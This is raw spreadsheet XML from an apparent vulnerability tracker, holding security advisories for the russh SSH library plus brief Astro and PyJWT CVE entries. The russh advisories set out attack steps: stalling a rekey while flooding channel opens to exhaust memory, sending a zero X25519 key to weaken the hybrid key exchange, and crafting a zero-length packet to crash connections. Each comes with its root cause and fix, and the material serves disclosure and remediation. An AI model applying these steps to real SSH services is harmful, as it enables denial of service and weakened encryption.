(`server/mod.rs:1232`) and is handled inline. For `SSH_MSG_CHANNEL_OPEN` this
reaches the channel-open handling, which hands the application a
`ChannelOpenHandle`.
Whether the handler accepts or (the trait default) rejects, the handle's
`accept` / `reject` / `Drop` all `send` a `Msg::ChannelOpenReply` on an
`UnboundedSender` (`russh/src/lib_inner.rs:560-603`; `Drop` sends
`AdministrativelyProhibited` at `:594-603`). That sender feeds
`priority_receiver`, declared `UnboundedReceiver&lt;Msg&gt;` (`session.rs:23`) and
created with `tokio::sync::mpsc::unbounded_channel()` (`session.rs:1522`). Its
only drain sites are the three arms gated off during the rekey. So each
`CHANNEL_OPEN` processed during the rekey window appends one reply (carrying a
`PendingChannelOpen` = channel params + mpsc `ChannelRef` + ids, a few KB
retained in practice) to a queue that is never dequeued.
Two facts make this unbounded and remote:
1. The server enters `InProgress` the moment it receives the peer's `KEXINIT`
   (`server/mod.rs:1153-1158`, `begin_rekey`) and only leaves it upon receiving
   the peer's `KEX_ECDH_INIT`. **The peer decides** whether to ever send that,
   so the window is attacker-held.
2. There is no per-connection cap on channels or on the priority queue, and the
   sender is unbounded (no backpressure).
### Root cause
The intended design was to *buffer* packets received during a rekey and replay
them afterwards: the fields `pending_reads: Vec&lt;Vec&lt;u8&gt;&gt;` and `pending_len: u32`
(`session.rs:26-27`) exist and are **drained** at kex completion
(`server/mod.rs:1194-1198`). But nothing ever **pushes** to `pending_reads` or
increments `pending_len` (they are dead — confirmed by grep across
`russh/src/`). Instead of being buffered, channel messages received during a
rekey are processed inline, and their replies pile up in the unbounded
`priority_receiver`. The missing piece is a bound on — or bounded deferral of —
channel processing while `kex.active()`.
## Proof of concept
Everything runs inside a container; nothing touches the host.
**Lab.** `poc/Dockerfile` builds `russh-lab:head` from Eugeny/russh @ `d3ae702`
(v0.63.1), default features (rust 1.91). A raw-SSH-client PoC
(`poc/poc_rekey_dos.rs`) implements curve25519-sha256 / ssh-ed25519 /
aes256-ctr / hmac-sha2-256 by hand, completes the handshake and a `publickey`
auth, then:
1. sends `SSH_MSG_KEXINIT` (server enters `kex.active()`),
2. **never** sends `KEX_ECDH_INIT` (rekey stalls, attacker-held),
3. floods `SSH_MSG_CHANNEL_OPEN`.
A minimal server (`poc/poc_server.rs`) uses the **trait-default**
`channel_open_session` (which rejects by dropping the handle), so the measured
growth is purely the undrained priority queue, not accepted-channel state.
`poc/run.sh` runs the attack leg and an identical **negative control** with no
rekey. Fresh run inside the lab, `N = 800,000` opens
(`results/rerun-2026-08-29.log`):
```
=== ATTACK (rekey stall) === (poc_server baseline_RSS=4208KB, N=800000)
  t=2s  server_RSS=667760KB
  t=4s  server_RSS=1599600KB
  t=6s  server_RSS=2556016KB
  t=8s  server_RSS=2566256KB   (flood done; memory retained)
=== CONTROL (no rekey) === (poc_server baseline_RSS=4208KB, N=800000)
  t=2s..t=12s  server_RSS=4208KB   (flat throughout)
```
- **ATTACK**: RSS `4,208 KB → 2,566,256 KB` (~2.57 GB) and retained after the
  flood ends — ~3.3 KB per `CHANNEL_OPEN`, attacker-driven. (An earlier canonical
  run reached 2.7 GB at 800k opens, and past 4.8 GB against the stock
  `echoserver` example at 1.5 M opens — see `results/canonical-run.log`.)
- **CONTROL**: RSS flat at `4,208 KB`. Without the rekey window the replies are
  drained normally; TCP backpressure (the client never reads the failure
  replies) even throttles the flood.
The control isolates the rekey window as the sole trigger. Both legs exercise
the real server entry point (`Session::run` → `reply` → `server_read_encrypted`)
over a real encrypted transport.
Reproduce: `C=russh-lab N=800000 ./poc/run.sh` (see `poc/POC-README.md`).
## Remediation
The priority queue carries locally generated channel-open replies, which are
non-kex messages the server **must not send** during a rekey anyway (RFC 4253
§7.1). So the fix is to bound how much channel work is done during a rekey, not
to drain the queue mid-rekey. Any of:
- **(recommended, minimal)** cap the number of non-kex messages processed while a
  rekey is in progress and disconnect a peer that exceeds it. A stalled/abusive
  rekey is then torn down after a small constant instead of growing memory
  without bound. See `patch/rekey-message-cap.patch` (a ~10-line change local to
  `Session::run`, validated in the lab — the attack leg is disconnected after the
  cap and RSS stays flat; a normal rekey, which completes in one round trip, is
  unaffected).
- bound / deferred-buffer channel messages during a rekey using the existing
  (currently dead) `pending_reads`/`pending_len` machinery, with a hard cap.
- bound the number of in-flight channel opens per connection and reject beyond it.
OpenSSH does not service new channels mid-kex; matching that intent closes the
whole family.</t>
        </is>
      </c>
      <c r="T380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102821</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102822</t>
        </is>
      </c>
      <c r="D381" s="5" t="inlineStr"/>
      <c r="E381" s="5" t="inlineStr"/>
      <c r="F381" s="5" t="inlineStr"/>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="inlineStr"/>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M381" s="5" t="inlineStr">
        <is>
          <t>0.63.1</t>
        </is>
      </c>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr"/>
      <c r="P381" s="5" t="inlineStr"/>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="S381" s="5" t="inlineStr">
        <is>
          <t>### Summary
`SshBlockCipher` implementations (AES-CBC, AES-CTR, 3DES-CBC, etc.) report `needs_mac() == true`, meaning they are documented/intended to always be paired with a separate integrity MAC. However, key-exchange negotiation only checks `needs_mac()` inside the *fallback* branch of MAC algorithm selection (used when no common MAC algorithm exists). If both peers' preferred MAC lists simply contain `none` and it is successfully negotiated through the normal selection path, nothing rejects pairing `none` with a cipher that requires a MAC. Once negotiated, a single crafted packet from either peer causes `cipher::read()` to shrink an already-allocated buffer below the number of bytes it is about to index, causing a Rust slice-index-out-of-range panic and killing that connection's task.
### Details
In `russh/src/cipher/mod.rs`, `read()` for a block cipher:
1. Reads `packet_length_to_read_for_block_length()` bytes up front (16 bytes for any `SshBlockCipher`) into `buffer.buffer`.
2. Decrypts the first block to recover the plaintext packet-length field `len`.
3. Computes `buffer.len = len + cipher.tag_len()`.
4. Calls `buffer.buffer.resize(buffer.len + 4, 0)`.
5. Immediately indexes `buffer.buffer[16..]` (via the constant used for the first block read) to continue decrypting/reading the rest of the packet.
When the negotiated MAC is `none`, `tag_len() == 0`. If the attacker (or a MITM holding the session key, or simply the accepting peer testing a hostile client) sends a packet whose *decrypted* length field is `0`, then `buffer.len = 0` and `resize(0 + 4, 0)` **shrinks** the buffer that was already grown to 16 bytes in step 1 down to 4 bytes. The subsequent slice operation `buffer.buffer[16..]` then panics with `range start index 16 out of range for slice of length 4`.
The file already defines a `MINIMUM_PACKET_LEN` constant, but it is only consulted on the *write*/padding side, never on the read path — so nothing prevents an incoming packet from declaring a length shorter than the bytes already buffered.
Negotiation gap: `negotiation.rs`'s `Select` MAC-selection logic only special-cases `needs_mac()` when negotiation would otherwise *fail* (no common MAC), substituting `none` only if the cipher does not need one. It never re-validates the case where `none` is a common/successfully-negotiated MAC on both sides regardless of what the chosen cipher requires. So an application (or a malicious peer, since negotiation is attacker-influenced on one side) that includes `none` in its own preferred MAC list — while still allowing the default CTR/CBC cipher suite — ends up with an invalid, panic-inducing combination that the library itself should refuse.
### PoC
1. Configure one side's `Preferred` config to include `mac::NONE` in the MAC list (this is a supported, non-default configuration exposed by the crate's public `Preferred` API — used e.g. for legacy/interop compatibility), while leaving the default cipher list (which includes `aes256-ctr`/`aes256-cbc`) untouched.
2. Complete a normal key exchange; negotiation lands on `{cipher: aes*-ctr (or -cbc), mac: none}` because `none` is present and preferred/common on both sides, and nothing during negotiation rejects this pairing.
3. From the peer, send one transport packet whose decrypted packet-length field is `0` (trivial to construct once the session keys are known to that peer, or for the peer that legitimately owns the connection to simply hand-craft, e.g. a modified client for testing).
4. `cipher::read()` on the receiving side panics: `range start index 16 out of range for slice of length 4`.
5. Because each connection is handled in its own `tokio::spawn`'ed task (see the per-connection `select!` loop that calls into `cipher::read()`), the panic unwinds only that task by default, but it unconditionally terminates that SSH connection/session — a working, currently-unauthenticated, already-established connection is killed with no attacker interaction beyond the one crafted packet, and the check runs on every inbound packet including pre-auth ones.
### Impact
Denial of service: a remote peer that can influence MAC preference negotiation (or a MITM in possession of the session key) can crash any individual SSH connection/session that ends up negotiating a block cipher together with `mac=none`, with a single crafted packet, pre-authentication. This does not affect the process as a whole (panic is scoped to that connection's task under `panic=unwind`), and does require a non-default configuration that permits `none` as a preferred MAC — hence Low severity.
### Suggested fix
In the MAC-selection logic in `negotiation.rs`, reject (or force substitution of) `mac::NONE` whenever the negotiated cipher's `needs_mac()` is `true`, regardless of *how* `none` came to be selected — not only in the "no common MAC" fallback branch. Defensively, `cipher::read()` could also refuse to shrink a buffer below the number of bytes already consumed for the length-field block, returning a protocol error instead of resizing blindly.
For credit/changelog purposes, please use: Yazan Balawneh, Cystack.ps</t>
        </is>
      </c>
      <c r="T381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102822</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102823</t>
        </is>
      </c>
      <c r="D382" s="5" t="inlineStr"/>
      <c r="E382" s="5" t="inlineStr"/>
      <c r="F382" s="5" t="inlineStr"/>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="inlineStr"/>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M382" s="5" t="inlineStr">
        <is>
          <t>0.63.1</t>
        </is>
      </c>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr"/>
      <c r="P382" s="5" t="inlineStr"/>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S382" s="5" t="inlineStr">
        <is>
          <t>### Summary
CVE-2026-68930 was fixed by adding `Session::is_established_channel()` in `russh/src/server/encrypted.rs`, which gates every channel-scoped SERVER-side message (CHANNEL_REQUEST, CHANNEL_DATA, CHANNEL_EOF, CHANNEL_CLOSE, CHANNEL_WINDOW_ADJUST, CHANNEL_EXTENDED_DATA) on `enc.channels.get(&amp;channel).is_some_and(|c| c.confirmed)` before invoking any `Handler` callback. The identical validation was never added to the CLIENT side (`russh/src/client/encrypted.rs`), which processes channel-scoped messages sent by the SSH SERVER once the client has authenticated.
### Details
In `client_read_authenticated` (`russh/src/client/encrypted.rs`, ~lines 431-757), for CHANNEL_DATA, CHANNEL_EXTENDED_DATA, CHANNEL_EOF, CHANNEL_CLOSE, CHANNEL_OPEN_FAILURE, CHANNEL_SUCCESS, CHANNEL_FAILURE, and the CHANNEL_REQUEST sub-types exit-status/exit-signal/xon-xoff, the code only optionally forwards the event to the internal per-channel mpsc sender via `if let Some(chan) = self.channels.get(&amp;channel_num) { ... }` (a no-op if the channel is unknown), but then **unconditionally** calls the corresponding public `Handler` trait method (`client.data(...)`, `client.exit_status(...)`, `client.channel_close(...)`, `client.channel_success(...)`, etc.) regardless of whether `channel_num` corresponds to any channel the client ever opened or that was ever confirmed. Only CHANNEL_OPEN_CONFIRMATION (closes the connection with `Error::Inconsistent` if unknown) and CHANNEL_WINDOW_ADJUST (returns early with `Ok(())` if unknown) correctly validate channel existence before acting.
Corroborating evidence this check was intended but never wired up: `crate::Error` defines a dedicated `WrongChannel` variant documented as "Message received/sent on unopened channel" (`russh/src/lib_inner.rs`, ~line 144-146), yet a repo-wide search shows this variant is never constructed or returned anywhere in the codebase — dead code left over from (or intended for) exactly this validation.
Because `Session::new_channel_id()` (`russh/src/session.rs`, ~line 708) allocates channel IDs sequentially starting at 1, a malicious or compromised SSH server can trivially predict the ID of the client's next channel and inject spoofed lifecycle events for it before or interleaved with the real channel-open exchange, or replay events for already-closed channel IDs.
### PoC
Many real-world consumers of russh-as-a-client (deployment/orchestration tools, CI runners connecting to build/bastion hosts, git-over-ssh style tooling, database/tunnel clients) implement the `client::Handler` trait directly and key their own state (e.g. `HashMap&lt;ChannelId, CommandState&gt;`, exit-code trackers, per-channel byte counters, completion futures) off the channel IDs the library hands them, trusting the documented contract that events like "The remote process has exited" (`exit_status`) or "Called when the server closes a channel" (`channel_close`) only fire for a channel the application itself opened.
A malicious, MITM'd (via a compromised/rogue jump host the client is configured to trust), or simply hostile SSH server can send `SSH_MSG_CHANNEL_REQUEST` (exit-status/exit-signal), `SSH_MSG_CHANNEL_DATA`, `SSH_MSG_CHANNEL_CLOSE`, `SSH_MSG_CHANNEL_SUCCESS`/`FAILURE`, or `SSH_MSG_CHANNEL_OPEN_FAILURE` for an arbitrary/predicted/never-opened channel ID at any point after authentication completes. Because the library invokes the `Handler` callback unconditionally, this reaches application code with an ID it never registered.
### Impact
(1) A reliable, purely protocol-level trigger for an application panic/DoS in any client that indexes per-channel state by `ChannelId` without itself re-checking channel validity — the exact class of bug CVE-2026-68930 fixed server-side; and (2) lets the server spoof exit-status/exit-signal/close/success/failure notifications for a channel the client has not yet opened or has already released, desynchronizing the client's command-completion bookkeeping (e.g. reporting a forged exit code 0 for a not-yet-run remote command, or a premature `channel_close` before real output/exit-status has arrived) — a business-logic-level integrity violation of the SSH channel lifecycle that automation built on russh implicitly relies on.
Suggested fix: add the same `is_established_channel()`-style gate already used in `server/encrypted.rs` to `client/encrypted.rs`'s `client_read_authenticated`, checking `self.channels.get(&amp;channel_num)` before invoking any `Handler` callback (not just the mpsc forward), for every channel-scoped message type.
For credit/changelog purposes, please use: Yazan Balawneh, Cystack.ps</t>
        </is>
      </c>
      <c r="T382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102823</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102824</t>
        </is>
      </c>
      <c r="D383" s="5" t="inlineStr"/>
      <c r="E383" s="5" t="inlineStr"/>
      <c r="F383" s="5" t="inlineStr"/>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="inlineStr"/>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M383" s="5" t="inlineStr">
        <is>
          <t>0.63.0</t>
        </is>
      </c>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr"/>
      <c r="P383" s="5" t="inlineStr"/>
      <c r="Q383" s="5" t="inlineStr"/>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="S383" s="5" t="inlineStr">
        <is>
          <t>## Vulnerability
The hybrid ML-KEM 768 + X25519 key exchange implementation in `russh/src/kex/hybrid_mlkem.rs` does not validate that the remote peer's X25519 public key is not the zero point (all-zero 32-byte value). This allows a remote peer to force the X25519 contribution to the combined shared secret to zero, reducing the hybrid KEX to a single-algorithm exchange.
Affected code at HEAD (v0.62.4, commit 0089c89):
**Server-side** (`server_dh`, lines 92-93):
```rust
let mut c_pk1 = MontgomeryPoint([0; 32]);
c_pk1.0.copy_from_slice(c_pk1_bytes);
// No zero-point check - proceeds to: let k_cl = s_secret * c_pk1;
```
**Client-side** (`compute_shared_secret`, lines 154-155):
```rust
let mut s_pk1 = MontgomeryPoint([0; 32]);
s_pk1.0.copy_from_slice(s_pk1_bytes);
// No zero-point check - proceeds to: let k_cl = x25519_secret * s_pk1;
```
## Root Cause
Commit a7fc1eb (2026-07-22, "fix mpint encoding and validate curve25519 keys") added zero-point validation to the standalone Curve25519 KEX in `russh/src/kex/curve25519.rs` at two locations:
- `server_dh` line 77: `if client_pubkey.0 == [0u8; 32] { return Err(crate::Error::Kex); }`
- `compute_shared_secret` line 122: `if remote_pubkey.0 == [0u8; 32] { return Err(crate::Error::Kex); }`
The same X25519 scalar multiplication pattern appears in `hybrid_mlkem.rs`, but the fix was not applied there.
## Proof of Concept
A malicious SSH client negotiating `mlkem768x25519-sha256` can send a KEX_HYBRID_INIT message containing a valid ML-KEM 768 encapsulation key followed by 32 zero bytes as the X25519 component.
When the server computes `k_cl = s_secret * c_pk1`, the result is the zero point regardless of the server's secret scalar. The combined shared secret `K = SHA-256(k_pq || k_cl)` then depends only on the ML-KEM component. The same attack works in reverse against a client connecting to a malicious server.
The zero X25519 public key passes all existing validation (the length check on line 78 succeeds since 32 bytes is correct). No panic or crash occurs - the exchange completes successfully with a weakened shared secret.
## Impact
The purpose of hybrid key exchange is defense-in-depth: if either the classical algorithm (X25519) or the post-quantum algorithm (ML-KEM 768) is broken, the combined secret remains secure. By injecting a zero X25519 public key, an attacker eliminates the classical contribution entirely, reducing security to depend solely on ML-KEM.
This matters in two scenarios:
1. If ML-KEM 768 is later found to have a weakness (the explicit threat model hybrid KEX is designed to mitigate), sessions where the X25519 component was zeroed out lose their fallback protection.
2. An active network attacker who can intercept KEX could downgrade the hybrid exchange to effectively single-algorithm security without either peer detecting it.
The severity is MEDIUM rather than HIGH because the ML-KEM component still provides strong security today, and an active attacker who can modify KEX messages can already perform other attacks unless strict KEX is negotiated.
## Suggested Fix
Add zero-point checks in `hybrid_mlkem.rs` matching the ones in `curve25519.rs`:
```rust
// In server_dh, after line 93:
let mut c_pk1 = MontgomeryPoint([0; 32]);
c_pk1.0.copy_from_slice(c_pk1_bytes);
if c_pk1.0 == [0u8; 32] {
    return Err(Error::Kex);
}
// In compute_shared_secret, after line 155:
let mut s_pk1 = MontgomeryPoint([0; 32]);
s_pk1.0.copy_from_slice(s_pk1_bytes);
if s_pk1.0 == [0u8; 32] {
    return Err(Error::Kex);
}
```
Ideally, also validate against the other small-subgroup points on Curve25519 (there are a small number of low-order points that also yield a zero shared secret), matching the comprehensive validation OpenSSH performs.
### AI tooling
AI assistancewas used for the code audit and for drafting this report. The finding was manually verified against the project's source at the location cited above before reporting it, and the severity and impact assessment are my own.</t>
        </is>
      </c>
      <c r="T383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102824</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102825</t>
        </is>
      </c>
      <c r="D384" s="5" t="inlineStr"/>
      <c r="E384" s="5" t="inlineStr"/>
      <c r="F384" s="5" t="inlineStr"/>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="inlineStr"/>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M384" s="5" t="inlineStr">
        <is>
          <t>0.62.6</t>
        </is>
      </c>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr"/>
      <c r="P384" s="5" t="inlineStr"/>
      <c r="Q384" s="5" t="inlineStr"/>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="S384" s="5" t="inlineStr">
        <is>
          <t>### Details
#### Affected versions and vulnerable location
- Confirmed present on default branch `main` at HEAD `0089c89c94753bebbec12b956c07a1cd38740379`.
- Crate version at HEAD: `0.62.4`.
- Vulnerable locations on current default branch:
  - `russh/src/server/mod.rs:91` (`pub max_auth_attempts: usize`)
  - `russh/src/server/mod.rs:121` (default `max_auth_attempts: 10`)
  - `russh/src/server/encrypted.rs:89` (`USERAUTH_REQUEST` dispatch into auth handler path)
  - `russh/src/server/encrypted.rs:98` (`self.common.auth_attempts += 1`)
  - `russh/src/server/encrypted.rs:53` (only runtime read of `auth_attempts`, used for initial reject timing, not attempt limiting)
- Default-branch history check did not show a newer merged commit adding enforcement against `config.max_auth_attempts`.
#### Reachability trace verified
1. Entry point: exported server API `server::run_stream` in `russh/src/server/mod.rs:1049`.
2. Session run loop in `russh/src/server/session.rs` processes incoming packets and calls `reply(...)` (`server/session.rs:725`).
3. `reply` forwards encrypted packets to `session.server_read_encrypted(...)` (`server/mod.rs:1221`).
4. `server_read_encrypted` routes `USERAUTH_REQUEST` to `enc.server_read_auth_request(...)` (`server/encrypted.rs:89`).
5. On each request, `self.common.auth_attempts += 1` executes (`server/encrypted.rs:98`).
6. No comparison against `self.common.config.max_auth_attempts` is present in this runtime flow.
### PoC
#### Reproduction steps and observed output
I did not run a full server process in this environment because Rust tooling is unavailable. I verified the issue from source and command output on the audited tree.
1. Show where `max_auth_attempts` appears:
```bash
rtk rg -n "max_auth_attempts" .scratch/russh/russh/src/server/mod.rs .scratch/russh/russh/src/server/encrypted.rs .scratch/russh/russh/src/server/session.rs
```
Observed:
```text
.scratch/russh/russh/src/server/mod.rs:91:    pub max_auth_attempts: usize,
.scratch/russh/russh/src/server/mod.rs:121:            max_auth_attempts: 10,
.scratch/russh/russh/src/server/mod.rs:148:            .field("max_auth_attempts", &amp;self.max_auth_attempts)
```
2. Show runtime auth-attempt handling:
```bash
rtk rg -n "auth_attempts == 0|auth_attempts \\+= 1" .scratch/russh/russh/src/server/encrypted.rs
```
Observed:
```text
53:        let initial_none_rejection_wait_until = if self.common.auth_attempts == 0 {
98:                self.common.auth_attempts += 1;
```
3. Show production entrypoint-to-auth path references:
```bash
rtk rg -n "pub async fn run_stream|match reply\\(|server_read_encrypted\\(|server_read_auth_request\\(" .scratch/russh/russh/src/server/mod.rs .scratch/russh/russh/src/server/session.rs .scratch/russh/russh/src/server/encrypted.rs
```
Observed:
```text
.scratch/russh/russh/src/server/encrypted.rs:89:                enc.server_read_auth_request(
.scratch/russh/russh/src/server/session.rs:725:                            match reply(&amp;mut self, &amp;mut handler, &amp;mut pkt).await {
.scratch/russh/russh/src/server/mod.rs:1049:pub async fn run_stream&lt;H, R&gt;(
.scratch/russh/russh/src/server/mod.rs:1221:    session.server_read_encrypted(handler, pkt).await
```
4. Toolchain check:
```bash
cargo --version
```
Observed:
```text
/bin/bash: line 1: cargo: command not found
```
### Impact
#### Attacker model
- Attacker: unauthenticated remote client with TCP reachability to a russh-backed SSH service.
- Preconditions: deployer expects `server::Config.max_auth_attempts` to cap attempts.
- Impact: repeated `USERAUTH_REQUEST` attempts continue for a single connection beyond configured limit, increasing online guessing opportunity and backend auth workload.
### Suggested fix
Enforce `max_auth_attempts` in the `USERAUTH_REQUEST` branch before invoking auth-method handlers, and fail closed once threshold is reached.
Concrete patch direction in `russh/src/server/encrypted.rs`:
```rust
if self.common.config.max_auth_attempts &gt; 0
    &amp;&amp; self.common.auth_attempts &gt;= self.common.config.max_auth_attempts
{
    self.common.disconnect(
        Disconnect::NoMoreAuthMethodsAvailable,
        "Too many authentication attempts",
        "",
    )?;
    return Ok(());
}
```
### How it was found and a note on tooling
The researcher synthesized three lens outputs, then revalidated each claim against current `main`: source presence and commit history, advisory overlap checks in both GitHub advisories and OSV, entrypoint-to-sink reachability, attacker-model realism, and execution-claim integrity. The researcher used `gh`, `git`, `rg`, and direct source inspection under `.scratch/russh`. Because Rust tooling is unavailable in this worker, this report is intentionally marked `source-only`.
AI assistance was used while investigating this and while drafting this report. The finding was verified by reading the cited code at HEAD. The vulnerability was not executed it, and that limit is stated plainly above rather than left implied.
Credits: arpitjain099.</t>
        </is>
      </c>
      <c r="T384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102825</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T384"/>
  <conditionalFormatting sqref="E2:E38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8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P3 - Medium</t>
        </is>
      </c>
      <c r="B2" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102984</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr">
        <is>
          <t>npm:@astrojs/node</t>
        </is>
      </c>
      <c r="M2" s="5" t="inlineStr">
        <is>
          <t>11.1.3</t>
        </is>
      </c>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Astro is a web framework for content-driven websites. Prior to 11.1.3, the @astrojs/node adapter builds a request URL from the Host header, and a malformed port can make that URL invalid. The recovery path reuses the same malformed host and throws an uncaught TypeError: Invalid URL before routing begins. In the default standalone configuration, the request returns an HTTP 500 response and the server continues running, but when staticHeaders is enabled the synchronous handler does not catch the exception and the Node process terminates. Proxies and CDNs that reject malformed Host headers prevent this path from reaching the origin. The issue affects availability only and does not expose data or permit code execution. This issue is fixed in version 11.1.3.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102984</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103001</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr">
        <is>
          <t>pip:PyJWT</t>
        </is>
      </c>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-471</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.11.0 through 2.13.0, PyJWT's PyJWT._merge_options() method can modify a caller-supplied mutable options mapping when verify_signature is false. If an application reuses that same mapping for a later decode() or decode_complete() call and changes verify_signature to true, the mapping can retain false values for expiration, not-before, issued-at, audience, issuer, subject, and JWT ID checks. A signed token with invalid registered claims can then be accepted without disabling signature verification, but applications that create a fresh options mapping for each call are not affected.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103001</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
